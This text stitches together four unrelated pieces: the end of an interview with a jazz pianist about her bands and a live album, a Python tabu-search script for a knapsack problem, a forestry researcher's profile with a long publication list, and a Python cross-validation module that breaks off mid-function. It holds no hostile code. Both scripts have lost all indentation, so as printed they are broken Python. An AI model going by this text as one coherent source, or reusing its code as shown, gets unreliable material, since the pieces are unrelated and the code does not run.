FH: Yes – actually from Billie Holiday onwards I worked pretty much chronologically. I needed to hear each movement of jazz before I understood the next. I remember loving Blue Trane but hating A Love Supreme! Since then I feel like my musical life has been about removing those set ideas about what I like and don’t like, and becoming open to more and more music.
LJN: When I hear your playing I always find there is a strong melodic line and logic. Is that something that’s important to you?
FH: Yes. I try to play what I hear rather than what my conscious brain might come up with. I think that way you’re more in tune with the listener too – if you want a break in the line, they’re probably ready for one too. I think that’s something that Peter instilled in me from early on.
LJN: You’re a pianist of choice in a number of other bands, right?
FH: I guess so! I’ve got a few projects on the go at the moment. I’ve been playing with Gilad Atzmon’s Orient House Ensemble for fourteen years now and we’ll be touring a new album from January. I think it’s our strongest one so far. And I’ve just finished a tour with the Sirkis/Bialis International Quartet, which was a great experience. Asaf and Sylwia wrote some very deep music for that band, it’s unlike anything else I’ve played or heard. Now I’m starting a tour with Tommaso Starace playing music he composed for the photos of Gianni Berengo Gardin. It’s great – very melodic, and with a lot of humour. And I’ve got a new duo album with singer Edith van den Heuvel about to come out. I’m really happy with that one, it’s very intimate and beautifully recorded.
LJN: How long have you been working with Enzo Zirilli and Dave Whitford?
FH: We started playing together a couple of years ago. They’re both incredibly inspiring musicians to work with. Enzo kind of fits into Louis Armstrong’s definition of jazz: he never plays the same way once. He’s always improvising, always searching, and finds some very beautiful and unusual places. Dave is my ideal bass player. He’s got a perfect balance of rooting things when they need to be rooted, combined with a lot of freedom. Like Enzo, there’s no ego there – he just listens and plays what needs to be played.
LJN: How is this album different from your others?
FH: The biggest difference is that it’s live! Our previous albums have always involved a lot of preparation, finding the right studio, writing and rehearsing the music… This one was never intended to be an album. We were on tour promoting our Lunaris album and I stuck my digital recorder on stage just to have my own record of what we were doing. But when I listened back to our gig at The Verdict in Brighton I heard something that’s very hard to capture in the studio. Playing close together in a great room and to an attentive audience lets you take risks, and - importantly - have fun. You’re not making judgments about what’s happening, you’re not wondering “is this the take”? You’re just listening and responding, so the music really plays itself.
We then spent a day in the studio mastering it – polishing it as much as we could, trying to bring the piano out a bit… The end result isn’t something that ECM would release but there’s something nice and honest about it.
LJN: In what formats are you making it available?
FH: Since it was free to record, I decided to make the MP3 version of the album free to download. But as some people still like physical objects, we also printed a CD with a bonus track.
LJN: What gigs have you got coming up?
FH: We’ve got a couple of gigs in December to celebrate the new album. On the 3rd we’re at the Albion Beatnik in Oxford (the bonus track on the CD was from a gig we did in Oxford). And then on December 12th we’re back at The Verdict in Brighton. We’ll also be doing a London launch in the spring. |
# -*- coding:utf-8 -*-
# Author: Marcos Castro
# Tabu Search - Integer Knapsack Problem
# Knapsack configuration
# Object (j) 1 2 3 4 5
# Weight (wj) 4 5 7 9 6
# Profit (pj) 2 2 3 4 4
# Goal: maximize the total profit of the selected items
# Objective function: f(s) = SUM[j=1..n](pj)(sj) - SUM[j=1..n](pj)(sj) * max{0, SUM[j=1..n](wj)(sj) - b}
# Simplified objective function: f(s) = SUM[j=1..n](pj)(sj) * [1 - max{0, SUM[j=1..n](wj)(sj) - b}]
# Neighborhood function: flip exactly one of the bits (this is how the neighbors are generated)
# function to get the weight of a given solution
# this function computes the weight summation
# takes a solution and the knapsack
def obter_peso(solucao, mochila):
peso = 0
for i in range(0, len(solucao)):
peso += solucao[i] * mochila[i][0]
return peso
# function that computes the objective function value
# takes a solution, the knapsack and the maximum knapsack capacity
def obter_avaliacao(solucao, mochila, capacidade_maxima):
somatorio_peso = 0
somatorio_beneficio = 0
for i in range(0, len(solucao)):
somatorio_peso += solucao[i] * mochila[i][0] # mochila[i][0] accesses the weight
somatorio_beneficio += solucao[i] * mochila[i][1] # mochila[i][1] accesses the profit
avaliacao = somatorio_beneficio * (1 - max(0, somatorio_peso - capacidade_maxima))
return avaliacao
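# Worked example (added illustration) with the knapsack defined below
# (weights [4, 5, 7, 9, 6], profits [2, 2, 3, 4, 4], capacity 23):
# the solution [1, 1, 1, 0, 1] weighs 4+5+7+6 = 22 <= 23, so its evaluation
# is the plain profit 2+2+3+4 = 11; the solution [1, 1, 1, 1, 1] weighs 31,
# so the excess of 8 turns the evaluation into 15 * (1 - 8) = -105,
# strongly penalizing infeasible solutions.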
# function to generate the neighbors; the neighborhood is generated by flipping one bit
# melhor_solucao - current best solution
# max_vizinhos - maximum number of neighbors
def gerar_vizinhos(melhor_solucao, max_vizinhos):
vizinhos = []
pos = 0
for i in range(0, max_vizinhos):
vizinho = []
for j in range(0, len(melhor_solucao)):
if j == pos:
if melhor_solucao[j] == 0:
vizinho.append(1)
else:
vizinho.append(0)
else:
vizinho.append(melhor_solucao[j])
vizinhos.append(vizinho)
pos += 1
return vizinhos
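# Quick illustration of the neighborhood (added example, not part of the
# original script): for melhor_solucao = [1, 0, 1] and max_vizinhos = 3,
# gerar_vizinhos returns [[0, 0, 1], [1, 1, 1], [1, 0, 0]] - each neighbor
# flips exactly one bit of the current solution.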
# function to get the evaluation value of each neighbor
# vizinhos - list of all neighbors
# mochila - the knapsack
# capacidade_maxima - maximum knapsack capacity
# max_vizinhos - maximum number of neighbors
def obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos):
vizinhos_avaliacao = []
for i in range(0, max_vizinhos):
vizinhos_avaliacao.append(obter_avaliacao(vizinhos[i], mochila, capacidade_maxima))
return vizinhos_avaliacao
# function to get the bit that was flipped
# melhor_solucao - current best solution
# melhor_vizinho - best neighbor
def obter_bit_modificado(melhor_solucao, melhor_vizinho):
for i in range(0, len(melhor_solucao)):
if melhor_solucao[i] != melhor_vizinho[i]:
return i
# function to get the neighbor with the highest evaluation
# vizinhos_avaliacao - evaluation value of all neighbors
# lista_tabu - tabu list that forbids a particular bit flip
# melhor_solucao - current best solution
# vizinhos - list with all neighbors
def obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos):
maxima_avaliacao = max(vizinhos_avaliacao)
pos = 0
bit_proibido = -1
# check whether the tabu list has any elements
if len(lista_tabu) != 0:
# if it does, there is a forbidden bit, so grab that bit
bit_proibido = lista_tabu[0]
# loop to find the position of the best neighbor
for i in range(0, len(vizinhos_avaliacao)):
if vizinhos_avaliacao[i] == maxima_avaliacao:
pos = i
break
# check whether the best neighbor is the result of a forbidden move
if bit_proibido != -1:
# if so, get the position of the bit that was flipped to generate this neighbor
bit_pos = obter_bit_modificado(melhor_solucao, vizinhos[pos])
# check whether that bit is on the tabu list (compare with bit_proibido)
if bit_pos == bit_proibido:
# if so, look for the second best neighbor instead
melhor_pos = 0
for i in range(1, len(vizinhos_avaliacao)):
if i != bit_pos:
if vizinhos_avaliacao[i] > vizinhos_avaliacao[melhor_pos]:
melhor_pos = i
return melhor_pos # returns the position of the second best neighbor
return pos # returns the position of the best neighbor
# knapsack configuration as a list of lists
# the first element is the weight and the second is the profit
mochila = [[4,2], [5,2], [7,3], [9,4], [6,4]]
iteracao = melhor_iteracao = 0
melhor_solucao = [] # will hold the best solution
lista_tabu = [] # tabu list, initially empty
capacidade_maxima = 23 # maximum capacity of the knapsack
bt_max = 1 # maximum number of iterations without improvement in the best solution value
max_vizinhos = 5 # maximum number of neighbors
# STEP 0
# generate a random initial solution
import random # module for generating random numbers
# the loop below draws the number 0 or 1 five times
for i in range(0, 5):
bit = random.randrange(2) # generates numbers from 0 (inclusive) to 1 (inclusive)
melhor_solucao.append(bit) # appends the bit to the list
# show the initial solution and its evaluation value
print('Initial solution: {0}, Evaluation: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
# get the current weight of the knapsack
peso_corrente = obter_peso(melhor_solucao, mochila)
# get the evaluation of melhor_solucao
melhor_avaliacao = obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)
# generate the neighbors (neighborhood)
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)
# compute the evaluation of all neighbors
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)
# get the position of the best neighbor
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# check whether the best neighbor has a better evaluation than the best so far
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# get the bit that was flipped to produce the best neighbor
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu.append(bit_modificado) # store the forbidden move
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # we have a better solution, make a copy
melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho] # update the best evaluation, keeping Step 0 consistent with the main loop below
melhor_iteracao += 1 # increment the iteration at which the best solution so far was found
iteracao += 1 # increment the iteration counter
# STEP 0 ends here; now we enter the loop (executing the other steps)
while True:
# the stopping condition is the difference between iteracao and melhor_iteracao exceeding bt_max
# iteracao is the global iteration (always incremented)
# melhor_iteracao is the iteration at which the best solution was found (not always incremented)
# bt_max is the maximum number of iterations without improvement in the best solution value
if (iteracao - melhor_iteracao) > bt_max:
break
# the lines below are almost identical to STEP 0
# generate new neighbors, making a copy of them
vizinhos = gerar_vizinhos(melhor_solucao, max_vizinhos)[:]
# get the evaluation value of all neighbors (makes a copy)
vizinhos_avaliacao = obter_avaliacao_vizinhos(vizinhos, mochila, capacidade_maxima, max_vizinhos)[:]
# get the position of the best neighbor
pos_melhor_vizinho = obter_vizinho_melhor_avaliacao(vizinhos_avaliacao, lista_tabu, melhor_solucao, vizinhos)
# check whether the best neighbor has a better evaluation than the current best
if vizinhos_avaliacao[pos_melhor_vizinho] > melhor_avaliacao:
# get the bit that was flipped to generate the best neighbor
bit_modificado = obter_bit_modificado(melhor_solucao, vizinhos[pos_melhor_vizinho])
lista_tabu[0] = bit_modificado # store the forbidden move (overwrites the entry; Step 0 used append)
melhor_solucao = vizinhos[pos_melhor_vizinho][:] # we have a better solution, make a copy of the list
melhor_avaliacao = vizinhos_avaliacao[pos_melhor_vizinho] # update the best evaluation
melhor_iteracao += 1 # increment the iteration at which the best solution was found (not always incremented)
iteracao += 1 # increment the iteration counter (always incremented)
# show the final solution and its evaluation
print('Final solution: {0}, Evaluation: {1}'.format(melhor_solucao, obter_avaliacao(melhor_solucao, mochila, capacidade_maxima)))
print('Best iteration: {0}'.format(melhor_iteracao)) # shows the iteration at which the best solution was found
print('Iteration: {0}'.format(iteracao)) # shows the global iteration
|
Contact Ronald S. Zalesny, Jr.
I study genetic and physiological mechanisms regulating biomass production of short rotation woody crops (e.g., poplars and willows) grown for phytotechnologies, bioenergy, and fiber.
The provision of ecosystem services associated with these end uses is tightly linked with increasing human population levels at regional, national, and global scales, resulting in the need for such services along the urban to rural continuum that balance community well-being with ecological health and stability. To address this need, I am advancing short rotation woody crop production systems for pollution remediation and renewable energy.
In addition to short rotation woody crops, I also study the impacts of changing climates on patterns of tree adaptation in northern coniferous forest ecosystems.
There is a need for long-term conifer management strategies that optimize ecosystem services such as carbon sequestration and feedstock production potential of plantations and natural forests. The success of such systems depends upon understanding the linkages among energy, climate, and tree genetics, which are vital for promoting biologically and economically sustainable reforestation, afforestation, and gene conservation.
Understanding the underlying genetic and physiological mechanisms regulating growth and development of short rotation woody crops supports effective deployment of favorable genotypes that helps: 1) reduce impacts from invasive species, 2) provide energy sources that do not contribute to increased atmospheric carbon dioxide (CO2) and global climate change, and 3) improve ecosystems along the urban to rural continuum through recovery, remediation, and restoration. Overall, the knowledge gained from my research helps growers and researchers increase the success of sustainable woody crop production systems, while providing essential ecosystem services such as clean water and healthy soils.
Zalesny Jr., Ronald S.; Stanturf, John A.; Gardiner, Emile S.; Bañuelos, Gary S.; Hallett, Richard A.; Hass, Amir; Stange, Craig M.; Perdue, James H.; Young, Timothy M.; Coyle, David R.; Headlee, William L. 2016. Environmental technologies of woody crop production systems.
Zalesny Jr., Ronald S.; Stanturf, John A.; Gardiner, Emile S.; Perdue, James H.; Young, Timothy M.; Coyle, David R.; Headlee, William L.; Bañuelos, Gary S.; Hass, Amir. 2016. Ecosystem services of woody crop production systems.
Lazarus, William; Headlee, William L.; Zalesny, Ronald S., Jr. 2015. Impacts of supplyshed-level differences in productivity and land Costs on the economics of hybrid poplar production in Minnesota, USA.
Zalesny, Ronald S., Jr.; Hallett, Richard A.; Falxa-Raymond, Nancy; Wiese, Adam H.; Birr, Bruce A. 2014. Propagating native Salicaceae for afforestation and restoration in New York City's five boroughs.
Headlee, William L.; Zalesny, Ronald S. Jr.; Donner, Deahn M.; Hall, Richard B. 2013. Using a process-based model (3-PG) to predict and map hybrid poplar biomass productivity in Minnesota and Wisconsin, USA.
Headlee, William L.; Zalesny, Ronald S. Jr.; Hall, Richard B.; Bauer, Edmund O.; Bender, Bradford; Birr, Bruce A.; Miller, Raymond O.; Randall, Jesse A.; Wiese, Adam H. 2013. Specific gravity of hybrid poplars in the north-central region, USA: within-tree variability and site × genotype effects.
Zalesny, Ronald S., Jr.; Donner, Deahn M.; Coyle, David R.; Headlee, William L. 2012. An approach for siting poplar energy production systems to increase productivity and associated ecosystem services.
Zalesny, Ronald S.; Hall, Richard B.; Zalesny, Jill A.; McMahon, Bernard G.; Berguson, William E.; Stanosz, Glen R. 2009. Biomass and Genotype × Environment Interactions of Populus Energy Crops in the Midwestern United States.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart; Hall, Richard B. 2008. Sodium and chloride accumulation in leaf, woody, and root tissue of Populus after irrigation with landfill leachate.
Headlee, William L.; Zalesny, Ronald S.; Hall, Richard B. 2018. Coarse root biomass and architecture of hybrid aspen 'Crandon' (Populus alba L. × P. grandidentata Michx.) grown in an agroforestry system in central Iowa, USA.
Chhin, Sophan; Zalesny, Ronald S.; Parker, William C.; Brissette, John. 2018. Dendroclimatic analysis of white pine (Pinus strobus L.) using long-term provenance test sites across eastern North America.
Zalesny, Ronald S., Jr.; Headlee, William L. 2015. Developing woody crops for the enhancement of ecosystem services under changing climates in the north central United States.
Mirck, Jaconette; Zalesny, Ronald S., Jr. 2015. Mini-review of knowledge gaps in salt tolerance of plants applied to willows and poplars.
Headlee, William L.; Hall, Richard B.; Zalesny, Ronald S., Jr. 2013. Establishment of alleycropped hybrid aspen "Crandon" in central Iowa, USA: effects of topographic position and fertilizer rate on above ground biomass production and allocation.
Zalesny, Ronald S., Jr.; Coyle, David R. 2013. Short rotation Populus: a bibliography of North American literature, 1989-2011.
Assibi Mahama, A.; Hall, Richard; Zalesny, Ronald. 2011. Differential interspecific incompatibility among Populus hybrids in sections Aigeiros Duby and Tacamahaca Spach.
Zalesny, R. S.; Zalesny, J. A. 2011. Clonal Variation in Lateral and Basal Rooting of Populus Irrigated with Landfill Leachate.
Lazarus, William F.; Tiffany, Douglas G.; Zalesny, Ronald S., Jr.; Riemenschneider, Don E. 2011. Economic impacts of short-rotation woody crops for energy or oriented strand board: a Minnesota case study.
Coyle, David R.; Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H. 2011. Irrigating poplar energy crops with landfill leachate negatively affects soil micro- and meso-fauna.
Padley, Eunice A.; Donner, Deahn M.; Fassnacht, Karin S.; Zalesny, Ronald S., Jr.; Birr, Bruce; Martin, Karl J. 2011. Managing carbon sequestration and storage in northern hardwood forests.
Zalesny, Ronald S., Jr.; Stanturf, John A.; Evett, Steven R.; Kandil, Nabil F.; Soriano, Christopher. 2011. Opportunities for woody crop production using treated wastewater in Egypt. I. Afforestation strategies.
Evett, Steven R.; Zalesny, Ronald S., Jr.; Kandil, Nabil F.; Stanturf, John A.; Soriano, Christopher. 2011. Opportunities for woody crop production using treated wastewater in Egypt. II. Irrigation strategies.
Zalesny Jr., R.S., Jr.; Cunningham, M.W.; Hall, R.B.; Mirck, J.; Rockwood, D.L.; Stanturf, J.A.; Volk, T.A. 2011. Woody biomass from short rotation energy crops. Chapter 2.
Coyle, David R.; Zalesny, Jill A.; Zalesny, Ronald S. Jr. 2010. A comprehensive database of poplar research in North America from 1980 - 2010.
Zalesny, R.S. Jr.; Donner, D.M.; Coyle, D.R.; Headlee, W.L.; Hall, R.B. 2010. An approach for siting poplar energy production systems to increase productivity and associated ecosystem services.
Headlee, W.L.; Hall, R.B.; Zalesny, R.S. Jr. 2010. Aspen-triticale alleycropping system: effects of landscape position and fertilizer rate.
Zalesny, R.S. Jr.; Headlee, W.L.; Hall, R.B.; Coyle, D.R. 2010. Carbon sequestration potential of poplar energy crops in the Midwest, USA.
Zalesny, Ronald S. Jr.; Zalesny, Jill A. 2010. Phyto-recurrent selection: a method for selecting Populus and Salix genotypes for environmental applications.
Donner, Deahn; Zalesny, Ron, Jr. 2010. Potential Land-use changes with Woody Energy Crop Production in Wisconsin and Minnesota.
Zhu, J.Y.; Pan, Xuejun; Zalesny, Ronald S. Jr. 2010. Pretreatment of woody biomass for biofuel production: energy efficiency, technologies, and recalcitrance.
Vance, Eric D.; Maguire, Douglas A.; Zalesny, Ronald S. Jr. 2010. Research strategies for increasing productivity of intensively managed forest plantations.
Zalesny, Ronald S. Jr.; Zalesny, Jill A. 2010. Using phytotechnologies to remediate brownfields, landfills, and other urban areas.
Zalesny, Ronald S. Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Donald E. 2009. Ex situ growth and biomass of Populus bioenergy crops irrigated and fertilized with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S. 2009. Chloride and sodium uptake potential over an entire rotation of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B.; Bauer, Edmund O. 2009. Clonal variation in morphology of Populus root systems following irrigation with landfill leachate or water during 2 years of establishment.
Zalesny, Jill A.; Coyle, David R.; Zalesny, Ronald S. Jr.; Wiese, Adam H. 2009. Effects of irrigating poplar energy crops with landfill leachate on soil micro- and meso-fauna.
Zalesny, Ronald S. Jr. 2009. Integrating phytotechnologies with energy crop production for biofuels, bioenergy, and bioproducts.
Zalesny, Ronald S. Jr.; Evett, Steven R.; Kandil, Nabil F.; Soriano, Chris; Stanturf, John A. 2009. Opportunities for woody crop production using treated wastewater in Egypt.
Zalesny, Ronald S., Jr.; Zalesny, Jill A. 2009. Selecting Populus with different adventitious root types for environmental benefits, fiber, and energy.
Mirck, Jaconette; Zalesny, Ronald S. Jr.; Dimitriou, Ioannis; Zalesny, Jill A.; Volk, Timothy A.; Mabee, Warren E. 2009. The use of short rotation willows and poplars for the recycling of saline waste waters.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B.; Bauer, Edmund O. 2008. Populus root system morphology during phytoremediation of landfill leachate.
Zalesny, Ronald S., Jr.; Mitchell, Rob; Richardson, Jim, eds. 2008. Biofuels, bioenergy, and bioproducts from sustainable agricultural and forest crops: proceedings of the short rotation crops international conference.
Zalesny, Ronald S., Jr.; Hall, Richard B.; Zalesny, Jill A.; Berguson, William E.; McMahon, Bernard G.; Stanosz, Glen R. 2008. Biomass potential of populus in the midwestern United States.
Kodrzycki, R.J.; Michaels, R.B.; Friend, A.L.; Zalesny, R.S., Jr.; Mawata, Ch.P.; McDonald, D.W. 2008. Non-destructive digital imaging in poplar allows detailed analysis of adventitious rooting dynamics.
Zalesny, Jill A.; Zalesny, Ronald S., Jr. 2008. Potential chloride and sodium uptake for 2- to 11-year-old populus irrigated with landfill leachate in the north central United States.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2008. Uptake of macro- and micro-nutrients into leaf, woody, and root tissue of Populus after irrigation with landfill leachate.
Zalesny, Ronald S., Jr.; Zalesny, Jill A. 2008. Variation in lateral and basal adventitious rooting of populus irrigated with landfill leachate: selection of favorable genotypes for environmental benefits.
Zalesny, Ronald S.; Bauer, Edmund O. 2007. Evaluation of Populus and Salix Continuously Irrigated with Landfill Leachate I. Genotype-Specific Elemental Phytoremediation.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Headlee, William L., Jr.; Hall, Richard B.; Mahama, A. Assibi; Zalesny, Jill A. 2007. An inexpensive and reliable monitoring station design for use with lightweight, compact data loggers.
Mahama, A. Assibi; Zalesny, Ronald S., Jr.; Hall, R.B. 2007. Breeding success and range of incompatibility among Populus hybrids in sections Aigeiros Duby and Tacamahaca Spach.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B. 2007. Choosing tree genotypes for phytoremediation of landfill leachate using phyto-recurrent selection.
Zalesny, Ronald S., Jr.; Zalesny, Jill A.; Bauer, Edmund O. 2007. Ecological sustainability of alternative biomass feedstock production for environmental benefits and bioenergy.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Zalesny, Jill A. 2007. Establishment and early growth of Populus hybrids irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2007. Evaluation of Populus and Salix continuously irrigated with landfill leachate II. Soils and early tree development.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, David R.; Hall, Richard B. 2007. Growth and biomass of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Coyle, D.R.; Hall, R.B. 2007. Leaf, woody, and root biomass of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2007. Macro- and micro-nutrient concentration in leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Sexton, Bart T.; Hall, Richard B. 2007. Phytoaccumulation of sodium and chloride into leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2007. Selecting and utilizing Populus and Salix for landfill covers: implications for leachate irrigation.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, A.H.; Sexton, B.; Hall, R.B. 2007. Sodium and chloride concentration in leaf, woody, and root tissue of Populus irrigated with landfill leachate.
Zalesny, Ronald S., Jr.; Friend, A. L.; Kodrzycki, B.; McDonald, D.W.; Michaels, R.; Wiese, A.H.; Powers, J.W. 2007. Using low energy x-ray radiography to evaluate root initiation and growth of Populus.
Wiese, Adam H.; Netzer, Daniel A.; Riemenschneider, Don E.; Zalesny, Ronald S., Jr. 2006. A weed compaction roller system for use with mechanical herbicide application.
Coleman, Mark; Zalesny, Ronald S., Jr. 2006. Annotated bibliography on phytoremediation.
Wiese, A.H.; Zalesny, J.A.; Donner, D.M.; Zalesny, Ronald S., Jr. 2006. Bud removal affects shoot, root, and callus development of hardwood Populus cuttings.
Zalesny, R. S., Jr.; Wiese, A.H. 2006. Date of shoot collection, genotype, and original shoot position affect early rooting of dormant hardwood cuttings of Populus.
Mahama, A. Assibi; Zalesny, Ronald S., Jr.; Hall, Richard B. 2006. Differential interspecific incompatibility in Populus breeding.
Zalesny, Ronald S., Jr. 2006. Genetic and environmental factors affecting early rooting of six Populus genomic groups: implications for tree improvement.
Zalesny, Ronald S., Jr.; Bauer, Edmund O. 2006. Phyto-recurrent selection: a tree improvement strategy for selecting genotypes used in phytoremediation.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B.; Sexton, Bart. 2006. Phytoremediation of landfill leachate using Populus.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Don E. 2006. Sapflow of hybrid poplar (Populus nigra L. x P. maximowiczii A. Henry 'NM6') during phytoremediation of landfill leachate.
Mahama, A. Assibi; Sparks, Brian; Zalesny, Ronald S., Jr.; Hall, Richard B. 2006. Successful grafting in poplar species (Populus spp.) breeding.
Wiese, Adam H.; Zalesny, Ronald S., Jr. 2006. Unique technical innovations for short rotation woody crops research and development.
Zalesny, Jill A.; Zalesny, Ronald S., Jr.; Wiese, Adam H.; Hall, Richard B. 2006. Using phyto-recurrent selection to choose Populus genotypes for phytoremediation of landfill leachate.
Zalesny, Ronald, Jr.; Riemenschneider, Don. 2006. Using short rotation woody crops for bioenergy in North America.
Wiese, Adam H.; Riemenschneider, Don E.; Zalesny, Ronald S., Jr. 2005. An inexpensive rhizotron design for two-dimensional, horizontal root growth measurements.
Zalesny, Ronald S., Jr.; Bauer, Edmund O.; Hall, Richard B.; Zalesny, Jill A.; Kunzman, Joshua; Rog, Chris J.; Riemenschneider, Don E. 2005. Clonal variation in survival and growth of hybrid poplar and willow in an in situ trial on soils heavily contaminated with petroleum hydrocarbons.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2005. Early rooting of dormant hardwood cuttings of Populus: analysis of quantitative genetics and genotype x environment interactions.
Zalesny, R.S., Jr.; Hall, R.B.; Bauer, E.O.; Riemenschneider, D.E. 2005. Soil temperature and precipitation affect the rooting ability of dormant hardwood cuttings of Populus.
Zalesny, Ronald S., Jr. 2004. Hybrid poplars: fast-growing, disease-resistant species has multiple uses.
Zalesny, R.S., Jr.; Bauer, E.O.; Riemenschneider, D.E. 2004. Use of belowground growing degree days to predict rooting of dormant hardwood cuttings of Populus.
Zalesny, Ronald S., Jr.; Wiese, Adam H.; Bauer, Edmund O.; Riemenschneider, Don E.; Sexton, Bart. 2004. Water usage and establishment success of Populus during phytoremediation of landfill effluent.
Zalesny, R.S., Jr.; Hall, R.B.; Bauer, E.O.; Riemenschneider, D.E. 2003. Shoot position affects root initiation and growth of dormant unrooted cuttings of Populus.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2002. Evaluating hybrid poplar rooting. I. genotype x environment interactions in three contrasting sites.
Zalesny, Ronald S., Jr.; Riemenschneider, Don E.; Hall, Richard B. 2002. Evaluating hybrid poplar rooting. II. backcross breeding method exhibits exceptional promise.
Zalesny, Ronald S., Jr.; Riemenschneider, Don; Bauer, Edmund. 2000. Analysis of genetic and environmental effects on hybrid poplar rooting in Central and Northern Minnesota, USA. |
# -*- coding: UTF-8 -*-
"""
This module defines an evaluation framework for performing cross-validation experiments with the implemented classifiers.
"""
from datetime import datetime
from math import sqrt
from sklearn.cross_validation import KFold
from scipy import stats as scipy_stats
import pandas
import numpy
from evaluation import plot
from evaluation.metrics import QualityMetricsCalculator, runtime_metrics, quality_metrics
calculated_stats = ["Mean", "Std deviation", "Confidence interval"]
def delta_in_ms(delta):
"""
Convert a timedelta object to milliseconds.
"""
return delta.seconds*1000.0+delta.microseconds/1000.0
def confidence_interval(data, alpha=0.1):
"""
Calculate the confidence interval for each column in a pandas dataframe.
@param data: A pandas dataframe with one or several columns.
@param alpha: The confidence level, by default the 90% confidence interval is calculated.
@return: A series where each entry contains the confidence-interval for the corresponding column.
"""
t = lambda column: scipy_stats.t.isf(alpha/2.0, len(column)-1)
width = lambda column: t(column) * numpy.std(column.values, ddof=1)/sqrt(len(column))
formatted_interval = lambda column: "%.2f +/- %.4f" % (column.mean(), width(column))
return pandas.Series([formatted_interval(data[c]) for c in data.columns], index=data.columns)
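# Illustrative use of confidence_interval (added example, not part of the
# original module): five precision measurements with mean 0.70 and sample
# standard deviation ~0.0158 give, at the default 90% level (t ~ 2.13 for
# 4 degrees of freedom):
#   >>> confidence_interval(pandas.DataFrame({"Precision": [0.70, 0.72, 0.68, 0.71, 0.69]}))
#   Precision    0.70 +/- 0.0151
#   dtype: object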
class Experiment:
"""
Class for performing cross-validation of several classifiers on one dataset.
"""
def __init__(self, dataset):
self.dataset = dataset
self.classifiers = []
def add_classifier(self, cls, name=None):
if name is not None:
cls.name = name
self.classifiers.append(cls)
def run_with_classifier(self, cls, data_for_folds):
"""
Perform cross-validation with one classifier.
@param data_for_folds: Contains one list of True/False values for each of the folds to be run. Each list states
for every item of the dataset, whether the item is in the current fold part of the training dataset or the
test dataset.
@param cls: Classifier to use in the experiment.
@return: Measurements for quality and runtime metrics.
"""
runtimes = []
quality = []
for train, test in data_for_folds:
#get the training and testing data for this fold
data_train, data_test = self.dataset.data[train], self.dataset.data[test]
target_train, target_test = self.dataset.target[train], self.dataset.target[test]
#perform training
train_time = datetime.now()
cls = cls.fit(data_train, target_train)
train_time = delta_in_ms(datetime.now()-train_time)
#apply the classifier on the test data
test_time = datetime.now()
recommendations = cls.predict(data_test)
test_time = delta_in_ms(datetime.now()-test_time)
#add measurements for this replication to result collection
runtimes.append({"Training time": train_time,
"Overall testing time": test_time,
"Individual testing time": test_time/float(len(data_test))})
quality.append(QualityMetricsCalculator(target_test, recommendations).calculate())
#calculate statistics over all replications
return self.calculate_quality_stats(cls.name, quality), self.calculate_runtime_stats(cls.name, runtimes)
def run(self, folds=10):
"""
Run the experiment with all classifiers.
@param folds: How many folds to run, perform 10-fold cross validation by default. folds must be >=2
@return A `Results` object that can be used to print and plot experiment results.
"""
assert(folds >= 2)
#divide the data into the specified number of folds
data_for_folds = KFold(len(self.dataset.data), n_folds=folds, indices=False)
#run all of the classifiers and collect quality and runtime statistics
stats = [self.run_with_classifier(cls, data_for_folds) for cls in self.classifiers]
#group all quality stats in one big matrix, all runtime stats in another matrix
quality_stats = pandas.concat([quality for quality, runtime in stats], axis=1)
runtime_stats = pandas.concat([runtime for quality, runtime in stats])
return Results(self.classifiers, quality_stats, runtime_stats)
@staticmethod
def calculate_quality_stats(cls_name, collected_measurements):
#make a big matrix of all collected measurements over all replications and group according to the cutoff
m = pandas.concat(collected_measurements)
grouped = m.groupby(m.index)
#calculate stats and rename columns to include name of the statistic and classifier,
#e.g. Precision -> (Naive Bayes, Precision, Mean)
map_column_names = lambda stat: {metric: (cls_name, metric, stat) for metric in quality_metrics}
means = grouped.mean().rename(columns=map_column_names("Mean"))
std = grouped.std().rename(columns=map_column_names("Std deviation"))
